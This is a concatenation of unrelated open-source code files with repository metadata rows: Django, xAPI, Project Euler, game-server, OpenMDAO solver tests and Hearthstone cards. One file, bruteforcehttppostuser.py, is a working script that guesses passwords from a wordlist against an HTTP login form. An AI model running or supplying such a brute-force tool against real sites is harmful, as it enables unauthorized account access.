default_shipping_address = models.ForeignKey(
Address, related_name='+', null=True, blank=True,
on_delete=models.SET_NULL,
verbose_name=pgettext_lazy('User field', 'default shipping address'))
default_billing_address = models.ForeignKey(
Address, related_name='+', null=True, blank=True,
on_delete=models.SET_NULL,
verbose_name=pgettext_lazy('User field', 'default billing address'))
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = []
objects = UserManager()
def __str__(self):
return self.get_username()
def natural_key(self):
return (self.get_username(),)
def get_full_name(self):
return self.email
def get_short_name(self):
return self.email
def get_username(self):
'Return the identifying username for this User'
return self.email
def is_anonymous(self):
return False
def is_authenticated(self):
return True
def set_password(self, raw_password):
self.password = make_password(raw_password)
def check_password(self, raw_password):
def setter(raw_password):
self.set_password(raw_password)
self.save(update_fields=['password'])
return check_password(raw_password, self.password, setter)
def set_unusable_password(self):
self.password = make_password(None)
def has_usable_password(self):
return is_password_usable(self.password)
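# --- Editor's usage sketch (illustration only; all field values are placeholders) ---
# create_user() hashes the password before saving, and store_address() funnels the
# address through AddressManager.store_address/get_or_create so duplicates are reused.
def _example_usage():  # never called; kept only as documentation
    user = User.objects.create_user('[email protected]', password='s3cret')
    address = Address(
        first_name='Jane', last_name='Doe',
        street_address_1='1 Example Street', city='Exampleville',
        postal_code='00-001', country='PL')
    User.objects.store_address(user, address, billing=True, shipping=True)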
| bsd-3-clause | 2,852,591,300,496,579,600 | 34.105263 | 77 | 0.634183 | false |
jasonmule/arbtt-swag-reporter | arbtt2xapi.py | 1 | 2536 | #!/usr/bin/env python
from __future__ import print_function
import os
from config import lrs, activity_map
from arbtt_record import ArbttRecord
from tincan import (
RemoteLRS,
Statement,
Agent,
Verb,
Activity,
ActivityDefinition,
Extensions,
Context,
LanguageMap,
)
def create_statement(arbtt_csv_entry):
"""Creates a Tincan statement from arbtt csv input"""
arbtt_record = ArbttRecord(arbtt_csv_entry)
app = arbtt_record.application
duration = arbtt_record.duration
# XXX: Look for a cleaner way to get user details
user = os.environ['LOGNAME']
email_address = "%[email protected]" % (user,)
actor = Agent(
name=user,
mbox='mailto:'+email_address,
)
verb = Verb(
id='http://adlnet.gov/expapi/verbs/interacted',
display=LanguageMap({'en-US': 'interacted'}),
)
# Get activity from config or set the activity as 'unknown'
activity_from_map = activity_map.get(app, "unknown")
object = Activity(
id=os.path.join(lrs['activities_uri'], activity_from_map),
definition=ActivityDefinition(
name=LanguageMap({'en-US': activity_from_map}),
extensions=Extensions(
{'http://id.tincanapi.com/extension/duration': duration},
),
),
)
context = Context(
platform=app
)
# Construct the statement
return Statement(
actor=actor,
verb=verb,
object=object,
context=context,
)
if __name__ == '__main__':
import fileinput
import sys
csv_entries = (l.strip() for l in fileinput.input())
remote_lrs = RemoteLRS(
endpoint=lrs['endpoint'],
# RemoteLRS uses HTTP Basic Auth
# so username, password will be sent out
# with the authorization header.
username=lrs['username'],
password=lrs['password'],
)
for csv_entry in csv_entries:
try:
statement = create_statement(csv_entry)
except ValueError, e:
# ignore invalid entries
print("Failed to create statement for %s with the error: %s"
% (csv_entry, e), file=sys.stderr)
continue
# XXX: Look out for response == None
# and possibly add the statement to a retry queue
response = remote_lrs.save_statement(statement)
if not response.success:
print("Failed to save statement for %s" % (csv_entry,))
| mit | -238,710,388,698,091,500 | 24.616162 | 73 | 0.594243 | false |
mbuhot/mbuhot-euler-solutions | python/problem-098.py | 1 | 2320 | #! /usr/bin/env python3
from collections import defaultdict
from itertools import combinations, permutations, count
from math import sqrt
description = '''
Anagramic squares
Problem 98
By replacing each of the letters in the word CARE with 1, 2, 9, and 6 respectively, we form a square number: 1296 = 36². What is remarkable is that, by using the same digital substitutions, the anagram, RACE, also forms a square number: 9216 = 96². We shall call CARE (and RACE) a square anagram word pair and specify further that leading zeroes are not permitted, neither may a different letter have the same digital value as another letter.
Using words.txt (right click and 'Save Link/Target As...'), a 16K text file containing nearly two-thousand common English words, find all the square anagram word pairs (a palindromic word is NOT considered to be an anagram of itself).
What is the largest square number formed by any member of such a pair?
NOTE: All anagrams formed must be contained in the given text file.
'''
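# Worked example, restating the substitution from the problem text above:
# with C=1, A=2, R=9, E=6 the word CARE encodes to 1296 = 36^2, and applying the
# same mapping to its anagram RACE gives 9216 = 96^2, so (CARE, RACE) is a square
# anagram word pair.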
def encodes(encoding, word, expected):
return all(encoding[c] == expected[i] for (i,c) in enumerate(word))
def squares(n):
for i in count(1):
sqstr = str(i*i)
if len(sqstr) < n: continue
elif len(sqstr) > n: break
else: yield sqstr
def squareEncodings(letters, word1, word2):
for sq1str in squares(len(word1)):
c2d = dict(zip(word1, sq1str))
d2c = dict(zip(sq1str, word1))
if not encodes(c2d, word1, sq1str): continue
if not encodes(d2c, sq1str, word1): continue
for sq2str in squares(len(word1)):
if encodes(c2d, word2, sq2str):
yield (c2d, int(sq1str), int(sq2str))
def squareAnagrams(anagrams):
for (letters, wordset) in anagrams.items():
print(wordset)
for (word1, word2) in combinations(wordset, 2):
for (encoding, n1, n2) in squareEncodings(letters, word1, word2):
yield(word1, word2, encoding, n1, n2)
def readAnagrams():
with open('words-98.txt', 'r') as f:
words = [w[1:-1] for w in f.read().split(',')]
anagrams = defaultdict(set)
for word in words:
key = ''.join(sorted(word))
anagrams[key].add(word)
return dict((k,v) for (k,v) in anagrams.items() if len(v) > 1)
anagrams = readAnagrams()
results = squareAnagrams(anagrams)
print(max(results, key=lambda x: max(x[3], x[4])))
| mit | 7,893,644,826,818,010,000 | 38.322034 | 442 | 0.701293 | false |
manpen/thrill | frontends/swig_python/python_rpyc.py | 4 | 1113 | #!/usr/bin/env python
##########################################################################
# frontends/swig_python/python_rpyc.py
#
# Part of Project Thrill - http://project-thrill.org
#
# Copyright (C) 2015 Timo Bingmann <[email protected]>
#
# All rights reserved. Published under the BSD-2 license in the LICENSE file.
##########################################################################
from RemoteThrill import *
# rt = RemoteThrill([["localhost", 18861]], ["localhost:1234"])
rt = RemoteThrill([["localhost", 18861], ["localhost", 18862]],
["localhost:1234", "localhost:1235"])
def genfunc(x):
print("gen", x)
return int(x + 10)
dia1 = rt.Generate(genfunc, 16)
print(dia1.AllGather())
dia2 = rt.Distribute(range(1, 100))
print("dia2.AllGather", dia2.AllGather())
print("dia2.Size", dia2.Size())
dia2pairs = dia2.Map(lambda x: [x, x])
dia3 = dia2pairs.ReduceBy(lambda x: (x[0] % 10),
lambda x, y: (x[0], x[1] + y[1]))
print("dia3.AllGather", dia3.AllGather())
##########################################################################
| bsd-2-clause | 218,308,223,493,588,000 | 28.289474 | 77 | 0.510332 | false |
gentimouton/swarch | pubsub-events/gamemanager.py | 1 | 4172 | """
Node connecting to the broker like a normal player,
except it stores an up-to-date game state by subscribing to all in-game events,
and it runs the whole game with its own tick.
"""
from __future__ import division  # so that division yields floats instead of ints
from network import poll_for, Handler
from random import randint
import time
##################### game logic #############
TICK_DURATION = 0.05 # seconds
# game state
borders = [[0, 0, 2, 300], [0, 0, 400, 2], [398, 0, 2, 300], [0, 298, 400, 2]]
pellets = [[randint(10, 390), randint(10, 290), 5, 5] for _ in range(4)]
players = {} # map a player name to a player object
# map inputs received from clients to directions
input_dir = {'up': [0, -1], 'down': [0, 1],
'left': [-1, 0], 'right': [1, 0]}
class Player:
def __init__(self, name):
self.name = name
self.revive()
def revive(self):
self.box = [randint(10, 380), randint(10, 280), 10, 10]
self.dir = input_dir['down'] # original direction: downwards
self.speed = 2
def change_dir(self, inputt):
self.dir = input_dir[inputt]
def move(self):
self.box[0] += self.dir[0] * self.speed
self.box[1] += self.dir[1] * self.speed
def grow_and_slow(self, qty=2):
self.box[2] += qty
self.box[3] += qty
self.speed -= self.speed / 6
def collide_borders(self):
[self.revive() for border in borders if collide_boxes(self.box, border)]
def collide_other_players(self):
for p in players.values():
# only the player with lowest id of the pair detects the collision
if self.name < p.name and collide_boxes(self.box, p.box):
playerw, pw = self.box[2], p.box[2] # widths
if playerw > pw:
self.grow_and_slow(pw)
p.revive()
elif playerw < pw:
p.grow_and_slow(playerw)
self.revive()
else: # they have same width: kill both
p.revive()
self.revive()
def collide_pellets(self):
for index, pellet in enumerate(pellets):
if collide_boxes(self.box, pellet):
self.grow_and_slow()
pellets[index] = [randint(10, 390), randint(10, 290), 5, 5]
def update(self):
self.move()
self.collide_borders()
self.collide_other_players()
self.collide_pellets()
def collide_boxes(box1, box2):
x1, y1, w1, h1 = box1
x2, y2, w2, h2 = box2
return x1 < x2 + w2 and y1 < y2 + h2 and x2 < x1 + w1 and y2 < y1 + h1
################### network ##############
event_queue = [] # list of events
# events can be ('join', player_name) or ('change_dir', (player_name, direction)),
# as handled in apply_events below
class GameManager(Handler):
def on_open(self):
self.do_send(('_sub', 'join'))
self.do_send(('_sub', 'change_dir'))
def on_msg(self, data):
mtype, mdata = data
event_queue.append((mtype, mdata))
gm = GameManager('localhost', 8888) # connect asynchronously, as a node
######################### loop #######################
def apply_events():
# apply events onto game state
global event_queue
for mtype, mdata in event_queue:
if mtype == 'join' and mdata not in players:
# players should provide a unique name to identify themselves
players[mdata] = Player(mdata)
elif mtype == 'change_dir':
pname, dir = mdata
players[pname].change_dir(dir)
event_queue = []
def update_simulation():
[player.update() for player in players.values()]
def publish_state():
# Send the whole game state
serialized_players = {p.name: p.box for p in players.values()}
state = {'borders': borders,
'pellets': pellets,
'players': serialized_players}
gm.do_send(('state', state))
while 1:
loop_start = time.time()
apply_events()
update_simulation()
publish_state()
poll_for(TICK_DURATION - (time.time() - loop_start)) # poll until tick is over
| mit | 6,486,540,832,240,276,000 | 30.847328 | 83 | 0.546021 | false |
elvandy/nltools | nltools/tests/test_analysis.py | 1 | 1328 | from __future__ import division
import os
import nibabel as nb
import pandas as pd
from nltools.simulator import Simulator
from nltools.analysis import Roc
from nltools.data import Brain_Data
import matplotlib
matplotlib.use('TkAgg')
def test_roc(tmpdir):
sim = Simulator()
r = 10
sigma = .1
y = [0, 1]
n_reps = 10
# output_dir = str(tmpdir)
dat = sim.create_data(y, sigma, reps=n_reps, output_dir=None)
# dat = Brain_Data(data=sim.data, Y=sim.y)
algorithm = 'svm'
# output_dir = str(tmpdir)
# cv = {'type': 'kfolds', 'n_folds': 5, 'subject_id': sim.rep_id}
extra = {'kernel': 'linear'}
output = dat.predict(algorithm='svm', plot=False, **extra)
# Single-Interval
roc = Roc(input_values=output['yfit_all'], binary_outcome=output['Y'] == 1)
roc.calculate()
roc.summary()
assert roc.accuracy == 1
# Forced Choice
binary_outcome = output['Y'] == 1
forced_choice = list(range(int(len(binary_outcome)/2))) + list(range(int(len(binary_outcome)/2)))
    forced_choice = sorted(forced_choice)  # list.sort() returns None, so use sorted() to keep the list
roc_fc = Roc(input_values=output['yfit_all'], binary_outcome=binary_outcome, forced_choice=forced_choice)
roc_fc.calculate()
assert roc_fc.accuracy == 1
assert roc_fc.accuracy == roc_fc.auc == roc_fc.sensitivity == roc_fc.specificity
| mit | 3,994,434,864,774,681,000 | 30.619048 | 109 | 0.651355 | false |
andremilke/utility | bruteforcehttppostuser.py | 1 | 2616 | import requests
import datetime
import sys
class BruteForceService(object):
def __init__(self, _listpass, _url, _user, _quote):
self._listpass = _listpass
self._url = _url
self._user = _user
self._quote = _quote
def bruteForce(self):
        fpass = open(self._listpass, encoding="utf8", errors='ignore')
#try:
# with requests.Session() as s:
# gettoken = s.get(_url,timeout = 3)
#gottoken = gettoken.content.split('name="token"')[1].split('"')[1]
# print(gettoken.content)
#except requests.exceptions.RequestException as e:
# print('exception caught', e)
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'Accept-Language': 'pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Content-Type': 'application/x-www-form-urlencoded',
'Cache-Control': 'no-cache', 'Connection': 'Keep-Alive'}
start = datetime.datetime.now()
for line in fpass:
try:
passw = line.rstrip("\n")
print("Trying.. %s" % (passw))
with requests.Session() as s:
                    _post_data = {'password': passw, 'login': self._user}
                    _post_response = s.post(url=self._url, data=_post_data,
                                            headers=headers)
                    result = _post_response.text
                    if self._quote not in result:
end = datetime.datetime.now()
totaltime = end - start
time = int(totaltime.total_seconds() / 60)
print("[+] Password founded %s" % (passw))
print("[+} Duration (minutes): %s" % (time))
#print(result)
break
_post_response.close()
except requests.exceptions.RequestException as e:
print('exception caught', e)
if __name__ == "__main__":
if len(sys.argv) == 5:
_listpass = sys.argv[1]
_url = sys.argv[2]
_user = sys.argv[3]
_quote = sys.argv[4]
brutehttp = BruteForceService(_listpass, _url, _user, _quote)
brutehttp.bruteForce()
else:
print("It is necessary to inform: password list, url, user and invalid quote")
| gpl-3.0 | 9,022,212,661,332,924,000 | 40.885246 | 172 | 0.487003 | false |
HyperloopTeam/FullOpenMDAO | lib/python2.7/site-packages/openmdao.lib-0.13.0-py2.7.egg/openmdao/lib/drivers/test/test_newton.py | 1 | 17894 | """
Test the Newton solver
"""
import unittest
import numpy
# pylint: disable=F0401,E0611
from openmdao.lib.drivers.newton_solver import NewtonSolver
from openmdao.lib.optproblems.scalable import Discipline
from openmdao.lib.optproblems.sellar import Discipline1_WithDerivatives, \
Discipline2_WithDerivatives, \
Discipline1, Discipline2
from openmdao.main.api import Assembly, Component, set_as_top, Driver
from openmdao.main.hasparameters import HasParameters
from openmdao.main.interfaces import IHasParameters, implements
from openmdao.main.test.simpledriver import SimpleDriver
from openmdao.main.datatypes.api import Float
from openmdao.test.execcomp import ExecComp, ExecCompWithDerivatives
from openmdao.util.testutil import assert_rel_error
from openmdao.util.decorators import add_delegate
class Sellar_MDA(Assembly):
def configure(self):
self.add('d1', Discipline1_WithDerivatives())
self.d1.x1 = 1.0
self.d1.y1 = 1.0
self.d1.y2 = 1.0
self.d1.z1 = 5.0
self.d1.z2 = 2.0
self.add('d2', Discipline2_WithDerivatives())
self.d2.y1 = 1.0
self.d2.y2 = 1.0
self.d2.z1 = 5.0
self.d2.z2 = 2.0
self.connect('d1.y1', 'd2.y1')
#self.connect('d2.y2', 'd1.y2')
self.add('driver', NewtonSolver())
self.driver.workflow.add(['d1', 'd2'])
self.driver.add_parameter('d1.y2', low=-1e99, high=1e99)
self.driver.add_constraint('d1.y2 = d2.y2')
class Sellar_MDA_subbed(Assembly):
def configure(self):
self.add('d1', Discipline1_WithDerivatives())
self.d1.x1 = 1.0
self.d1.y1 = 1.0
self.d1.y2 = 1.0
self.d1.z1 = 5.0
self.d1.z2 = 2.0
self.add('d2', Discipline2_WithDerivatives())
self.d2.y1 = 1.0
self.d2.y2 = 1.0
self.d2.z1 = 5.0
self.d2.z2 = 2.0
self.connect('d1.y1', 'd2.y1')
#self.connect('d2.y2', 'd1.y2')
self.add('subdriver', NewtonSolver())
self.driver.workflow.add(['subdriver'])
self.subdriver.workflow.add(['d1', 'd2'])
self.driver.add_parameter('d1.y2', low=-1e99, high=1e99)
self.driver.add_constraint('d1.y2 = d2.y2')
class Sellar_MDA_Mixed(Assembly):
def configure(self):
self.add('d1', Discipline1())
self.d1.x1 = 1.0
self.d1.y1 = 1.0
self.d1.y2 = 1.0
self.d1.z1 = 5.0
self.d1.z2 = 2.0
self.add('d2', Discipline2_WithDerivatives())
self.d2.y1 = 1.0
self.d2.y2 = 1.0
self.d2.z1 = 5.0
self.d2.z2 = 2.0
self.connect('d1.y1', 'd2.y1')
#self.connect('d2.y2', 'd1.y2')
self.add('driver', NewtonSolver())
self.driver.workflow.add(['d1', 'd2'])
self.driver.add_parameter('d1.y2', low=-1e99, high=1e99)
self.driver.add_constraint('d1.y2 = d2.y2')
class Sellar_MDA_Mixed_Flipped(Assembly):
def configure(self):
self.add('d1', Discipline1_WithDerivatives())
self.d1.x1 = 1.0
self.d1.y1 = 1.0
self.d1.y2 = 1.0
self.d1.z1 = 5.0
self.d1.z2 = 2.0
self.add('d2', Discipline2())
self.d2.y1 = 1.0
self.d2.y2 = 1.0
self.d2.z1 = 5.0
self.d2.z2 = 2.0
self.connect('d1.y1', 'd2.y1')
#self.connect('d2.y2', 'd1.y2')
self.add('driver', NewtonSolver())
self.driver.workflow.add(['d1', 'd2'])
self.driver.add_parameter('d1.y2', low=-1e99, high=1e99)
self.driver.add_constraint('d1.y2 = d2.y2')
class Sellar_MDA_None(Assembly):
def configure(self):
self.add('d1', Discipline1())
self.d1.x1 = 1.0
self.d1.y1 = 1.0
self.d1.y2 = 1.0
self.d1.z1 = 5.0
self.d1.z2 = 2.0
self.add('d2', Discipline2())
self.d2.y1 = 1.0
self.d2.y2 = 1.0
self.d2.z1 = 5.0
self.d2.z2 = 2.0
self.connect('d1.y1', 'd2.y1')
#self.connect('d2.y2', 'd1.y2')
self.add('driver', NewtonSolver())
self.driver.workflow.add(['d1', 'd2'])
self.driver.add_parameter('d1.y2', low=-1e99, high=1e99)
self.driver.add_constraint('d1.y2 = d2.y2')
class Scalable_MDA(Assembly):
def configure(self):
self.add('d1', Discipline(prob_size=2))
self.add('d2', Discipline(prob_size=2))
self.connect('d1.y_out', 'd2.y_in')
#self.connect('d2.y_out', 'd1.y_in')
self.add('driver', NewtonSolver())
self.driver.workflow.add(['d1', 'd2'])
self.driver.add_parameter('d1.y_in', low=-1e99, high=1e99)
self.driver.add_constraint('d2.y_out = d1.y_in')
##self.driver.add_constraint('d1.y_in = d2.y_out')
class Newton_SolverTestCase(unittest.TestCase):
"""test the Newton Solver component"""
def setUp(self):
self.top = set_as_top(Sellar_MDA())
def tearDown(self):
self.top = None
def test_newton(self):
print self.top.d1.y1, self.top.d2.y1, self.top.d1.y2, self.top.d2.y2
self.top.run()
print self.top.d1.y1, self.top.d2.y1, self.top.d1.y2, self.top.d2.y2
assert_rel_error(self, self.top.d1.y1,
self.top.d2.y1,
1.0e-4)
assert_rel_error(self, self.top.d1.y2,
self.top.d2.y2,
1.0e-4)
def test_newton_flip_constraint(self):
self.top.driver.clear_constraints()
self.top.driver.add_constraint('d2.y2 = d1.y2')
self.top.run()
assert_rel_error(self, self.top.d1.y1,
self.top.d2.y1,
1.0e-4)
assert_rel_error(self, self.top.d1.y2,
self.top.d2.y2,
1.0e-4)
def test_newton_mixed(self):
self.top = set_as_top(Sellar_MDA_Mixed())
self.top.run()
assert_rel_error(self, self.top.d1.y1,
self.top.d2.y1,
1.0e-4)
assert_rel_error(self, self.top.d1.y2,
self.top.d2.y2,
1.0e-4)
def test_newton_mixed_flipped(self):
self.top = set_as_top(Sellar_MDA_Mixed_Flipped())
self.top.run()
assert_rel_error(self, self.top.d1.y1,
self.top.d2.y1,
1.0e-4)
assert_rel_error(self, self.top.d1.y2,
self.top.d2.y2,
1.0e-4)
def test_newton_none(self):
self.top = set_as_top(Sellar_MDA_None())
self.top.run()
assert_rel_error(self, self.top.d1.y1,
self.top.d2.y1,
1.0e-4)
assert_rel_error(self, self.top.d1.y2,
self.top.d2.y2,
1.0e-4)
def test_scalable_newton(self):
# This verifies that it works for arrays
self.top = set_as_top(Scalable_MDA())
self.top.d1.x = self.top.d2.x = numpy.array([[3.0], [-1.5]])
self.top.d1.z = self.top.d2.z = numpy.array([[-1.3], [2.45]])
self.top.d1.C_y = numpy.array([[1.1, 1.3], [1.05, 1.13]])
self.top.d2.C_y = numpy.array([[0.95, 0.98], [0.97, 0.95]])
self.top.run()
assert_rel_error(self, self.top.d1.y_out[0],
self.top.d2.y_in[0],
1.0e-4)
assert_rel_error(self, self.top.d1.y_out[1],
self.top.d2.y_in[1],
1.0e-4)
assert_rel_error(self, self.top.d2.y_out[0],
self.top.d1.y_in[0],
1.0e-4)
assert_rel_error(self, self.top.d2.y_out[1],
self.top.d1.y_in[1],
1.0e-4)
def test_general_solver(self):
a = set_as_top(Assembly())
comp = a.add('comp', ExecComp(exprs=["f=a * x**n + b * x - c"]))
comp.n = 77.0/27.0
comp.a = 1.0
comp.b = 1.0
comp.c = 10.0
comp.x = 0.0
driver = a.add('driver', NewtonSolver())
driver.workflow.add('comp')
driver.add_parameter('comp.x', 0, 100)
driver.add_constraint('comp.f=0')
self.top.driver.gradient_options.fd_step = 0.01
self.top.driver.gradient_options.fd_step_type = 'relative'
a.run()
assert_rel_error(self, a.comp.x, 2.06720359226, .0001)
assert_rel_error(self, a.comp.f, 0, .0001)
# The following test generates warnings due to nans and infs in u and df
# vectors in the newton backtracking. The test doesn't actually check
# anything except apparently that we don't raise an exception, so it's
# not really a good test.
#def test_initial_run(self):
#class MyComp(Component):
#x = Float(0.0, iotype='in')
#xx = Float(0.0, iotype='in', low=-100000, high=100000)
#f_x = Float(iotype='out')
#y = Float(iotype='out')
#def execute(self):
#if self.xx != 1.0:
#self.raise_exception("Lazy", RuntimeError)
#self.f_x = 2.0*self.x
#self.y = self.x
#@add_delegate(HasParameters)
#class SpecialDriver(Driver):
#implements(IHasParameters)
#def execute(self):
#self.set_parameters([1.0])
#top = set_as_top(Assembly())
#top.add('comp', MyComp())
#top.add('driver', NewtonSolver())
#top.add('subdriver', SpecialDriver())
#top.driver.workflow.add('subdriver')
#top.subdriver.workflow.add('comp')
#top.subdriver.add_parameter('comp.xx')
#top.driver.add_parameter('comp.x')
#top.driver.add_constraint('comp.y = 1.0')
#top.driver.max_iteration = 2
#top.run()
def test_newton_nested(self):
# Make sure derivatives across the newton-solved system are correct.
top = set_as_top(Assembly())
top.add('driver', SimpleDriver())
top.add('d1', Discipline1_WithDerivatives())
top.d1.x1 = 1.0
top.d1.y1 = 1.0
top.d1.y2 = 1.0
top.d1.z1 = 5.0
top.d1.z2 = 2.0
top.add('d2', Discipline2_WithDerivatives())
top.d2.y1 = 1.0
top.d2.y2 = 1.0
top.d2.z1 = 5.0
top.d2.z2 = 2.0
top.connect('d1.y1', 'd2.y1')
top.add('solver', NewtonSolver())
top.solver.atol = 1e-9
top.solver.workflow.add(['d1', 'd2'])
top.solver.add_parameter('d1.y2', low=-1e99, high=1e99)
top.solver.add_constraint('d1.y2 = d2.y2')
top.driver.workflow.add(['solver'])
top.driver.add_parameter('d1.z1', low=-100, high=100)
top.driver.add_objective('d1.y1 + d1.y2')
top.run()
J = top.driver.calc_gradient(mode='forward')
print J
assert_rel_error(self, J[0][0], 10.77542099, 1e-5)
J = top.driver.calc_gradient(mode='adjoint')
print J
assert_rel_error(self, J[0][0], 10.77542099, 1e-5)
top.driver.gradient_options.fd_step = 1e-7
top.driver.gradient_options.fd_form = 'central'
J = top.driver.calc_gradient(mode='fd')
print J
assert_rel_error(self, J[0][0], 10.77542099, 1e-5)
def test_equation(self):
top = set_as_top(Assembly())
top.add('precomp', ExecCompWithDerivatives(['y=x'],
['dy_dx = 1']))
top.precomp.x = 1.0
expr = ['y = 3.0*x*x -4.0*x']
deriv = ['dy_dx = 6.0*x -4.0']
top.add('comp', ExecCompWithDerivatives(expr, deriv))
top.driver.workflow.add(['comp'])
top.add('driver', NewtonSolver())
top.driver.add_parameter('comp.x')
top.driver.add_constraint('precomp.y - comp.y = 1.0 - 2.0')
top.run()
print top.comp.x, top.comp.y
assert_rel_error(self, top.comp.x, -0.38742588, 1e-4)
class Sellar_MDA_Cycles(Assembly):
def configure(self):
self.add('d1', Discipline1_WithDerivatives())
self.d1.x1 = 1.0
self.d1.y1 = 1.0
self.d1.y2 = 1.0
self.d1.z1 = 5.0
self.d1.z2 = 2.0
self.add('d2', Discipline2_WithDerivatives())
self.d2.y1 = 1.0
self.d2.y2 = 1.0
self.d2.z1 = 5.0
self.d2.z2 = 2.0
self.connect('d1.y1', 'd2.y1')
self.connect('d2.y2', 'd1.y2')
self.add('driver', NewtonSolver())
self.driver.workflow.add(['d1', 'd2'])
class SysX(Component):
z = Float(1.0, iotype='in')
x = Float(1.0, iotype='out')
def execute(self):
self.x = 0.8*self.z + 2
def provideJ(self):
return numpy.array([[0.8]])
def list_deriv_vars(self):
return ['z'], ['x']
class SysY(Component):
x = Float(1.0, iotype='in')
z = Float(1.0, iotype='in')
y = Float(1.0, iotype='out')
def execute(self):
self.y = -0.2*self.z + 4.0*self.x + 3
def provideJ(self):
return numpy.array([[4.0, -0.2]])
def list_deriv_vars(self):
return ['x', 'z'], ['y']
class SysZ(Component):
x = Float(1.0, iotype='in')
y = Float(1.0, iotype='in')
z = Float(1.0, iotype='out')
def execute(self):
self.z = 1.0*self.x - 1.0*self.y - 1.0
def provideJ(self):
return numpy.array([[1.0, -1.0]])
def list_deriv_vars(self):
return ['x', 'y'], ['z']
class DoubleCycle(Assembly):
def configure(self):
self.add('SysX', SysX())
self.add('SysY', SysY())
self.add('SysZ', SysZ())
self.connect('SysX.x', 'SysY.x')
self.connect('SysX.x', 'SysZ.x')
self.connect('SysY.y', 'SysZ.y')
self.connect('SysZ.z', 'SysX.z')
self.connect('SysZ.z', 'SysY.z')
self.add('driver', NewtonSolver())
self.driver.workflow.add(['SysX', 'SysY', 'SysZ'])
#self.driver.add_parameter('SysX.z')
#self.driver.add_constraint('SysX.z = SysZ.z')
class DoubleCycle_1PC(Assembly):
def configure(self):
self.add('SysX', SysX())
self.add('SysY', SysY())
self.add('SysZ', SysZ())
self.connect('SysX.x', 'SysY.x')
self.connect('SysX.x', 'SysZ.x')
self.connect('SysY.y', 'SysZ.y')
self.connect('SysZ.z', 'SysY.z')
self.add('driver', NewtonSolver())
self.driver.workflow.add(['SysX', 'SysY', 'SysZ'])
self.driver.add_parameter('SysX.z')
self.driver.add_constraint('SysX.z = SysZ.z')
class Newton_SolverTestCase_with_Cycles(unittest.TestCase):
"""test the Newton Solver component with cycles"""
def setUp(self):
self.top = set_as_top(Sellar_MDA_Cycles())
def tearDown(self):
self.top = None
def test_newton(self):
self.top.run()
assert_rel_error(self, self.top.d1.y1,
self.top.d2.y1,
1.0e-4)
assert_rel_error(self, self.top.d1.y2,
self.top.d2.y2,
1.0e-4)
def test_newton_nested(self):
# Make sure derivatives across the newton-solved system are correct.
top = set_as_top(Assembly())
top.add('driver', SimpleDriver())
top.add('d1', Discipline1_WithDerivatives())
top.d1.x1 = 1.0
top.d1.y1 = 1.0
top.d1.y2 = 1.0
top.d1.z1 = 5.0
top.d1.z2 = 2.0
top.add('d2', Discipline2_WithDerivatives())
top.d2.y1 = 1.0
top.d2.y2 = 1.0
top.d2.z1 = 5.0
top.d2.z2 = 2.0
top.connect('d1.y1', 'd2.y1')
top.connect('d2.y2', 'd1.y2')
top.add('solver', NewtonSolver())
top.solver.atol = 1e-9
top.solver.workflow.add(['d1', 'd2'])
top.driver.workflow.add(['solver'])
top.driver.add_parameter('d1.z1', low=-100, high=100)
top.driver.add_objective('d1.y1 + d1.y2')
top.run()
J = top.driver.calc_gradient(mode='forward')
assert_rel_error(self, J[0][0], 10.77542099, 1e-5)
J = top.driver.calc_gradient(mode='adjoint')
assert_rel_error(self, J[0][0], 10.77542099, 1e-5)
top.driver.gradient_options.fd_step = 1e-7
top.driver.gradient_options.fd_form = 'central'
J = top.driver.calc_gradient(mode='fd')
assert_rel_error(self, J[0][0], 10.77542099, 1e-5)
def test_for_push_scatters(self):
# This test will fail when we go to push scatters. The problem is
# that Newton (and linear Gauss Siedel) both need to poke values
# directly into the u vector and expects those values to be
# scattered. To make it work, we need to manually scatter them during
# execution of those solvers.
top = set_as_top(DoubleCycle_1PC())
top.run()
assert_rel_error(self, top.SysX.x, -0.5, .0001)
assert_rel_error(self, top.SysY.y, 1.625, .0001)
assert_rel_error(self, top.SysZ.z, -3.125, .0001)
def test_for_push_scatters__cycle_only(self):
# This test will fail when we go to push scatters. See Above.
# However, this flavor of the test was added because of a key error
# in the code that finds the smallest edges to break.
top = set_as_top(DoubleCycle())
top.run()
assert_rel_error(self, top.SysX.x, -0.5, .0001)
assert_rel_error(self, top.SysY.y, 1.625, .0001)
assert_rel_error(self, top.SysZ.z, -3.125, .0001)
if __name__ == "__main__":
unittest.main()
| gpl-2.0 | 6,668,682,735,263,272,000 | 28.528053 | 77 | 0.532525 | false |
jirenz/CS229_Project | hearthbreaker/cards/minions/druid.py | 1 | 11367 | from hearthbreaker.cards.base import MinionCard, ChoiceCard
from hearthbreaker.game_objects import Minion
from hearthbreaker.tags.action import Give, Damage, Silence, Transform, Draw, Heal, \
Summon, AddCard, GiveManaCrystal, Remove, Kill
from hearthbreaker.tags.base import Choice, Buff, Effect, Battlecry, Deathrattle, ActionTag
from hearthbreaker.tags.card_source import CardList, ObjectSource
from hearthbreaker.tags.condition import IsType, GreaterThan
from hearthbreaker.tags.event import Damaged, TurnEnded
from hearthbreaker.tags.selector import CharacterSelector, MinionSelector, SelfSelector, UserPicker, BothPlayer, \
PlayerSelector, HeroSelector, Count, DeadMinionSelector
from hearthbreaker.constants import CHARACTER_CLASS, CARD_RARITY, MINION_TYPE
from hearthbreaker.tags.status import ChangeAttack, ChangeHealth, Taunt, ManaChange
from hearthbreaker.cards.spells.neutral import spare_part_list
class Moonfire(ChoiceCard):
def __init__(self):
super().__init__("Moonfire", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, ref_name="moonfire_keeper")
class Dispel(ChoiceCard):
def __init__(self):
super().__init__("Dispel", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class KeeperOfTheGrove(MinionCard):
def __init__(self):
super().__init__("Keeper of the Grove", 4, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE, choices=[
Choice(Moonfire(), Damage(2), CharacterSelector(players=BothPlayer(), picker=UserPicker())),
Choice(Dispel(), Silence(), MinionSelector(players=BothPlayer(), picker=UserPicker()))
])
def create_minion(self, player):
return Minion(2, 4)
class CatDruid(MinionCard):
def __init__(self):
super().__init__("Druid of the Claw", 5, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST,
ref_name="Druid of the Claw (cat)")
